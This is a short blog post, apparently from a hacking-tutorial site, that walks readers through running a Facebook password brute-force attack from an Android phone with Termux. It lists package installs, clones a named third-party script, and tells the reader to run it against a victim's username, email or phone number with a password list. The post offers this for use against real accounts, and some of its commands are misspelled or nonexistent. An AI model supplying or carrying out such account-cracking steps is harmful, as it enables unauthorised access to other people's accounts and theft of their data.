Header Ads Widget

Responsive Advertisement

Only for Admin

Attack Brute Force on Facebook with Termux [Without Root]


Post subject:


 đŸ‘‰Today's post is about Brute Force Attack .. Today I will show you how to do Brute Force Attack .. If you do Brute Force Attack with the phone is not so fast .. I can not say whether you will succeed but I am teaching Brute Force Attack. Brute Force Learning is the key. And your success depends on the password list .. 

Let's get started:


1. pkg update
2. pkg upgrade
3. pkg install git
4. pkg install clone
5. pkg install pip2
6. pkg install pip
7. pkg install python2
8. pkg install python
9. pip install requiests
10. pip2 install mechanize


Then copy and paste the following command:
git clone https://gist.github.com/nelyj/7affd78213242d642451
11. ls
12. cd 7affd78213242d642451
13. ls
14. python2 facebook.py
Then Victim's username / email / number ..
then the location where you put the password list .. I have named password.txt in memory .. so I
will give you the password file instead of password.txt / sdcard/ password.txt. ..
then you see Brute Force Attack has started ..

Sorry there is a hurry so I could not explain it well .. If not now I would not give it today ... If there is any problem then let me know .. but I cannot reply the night before.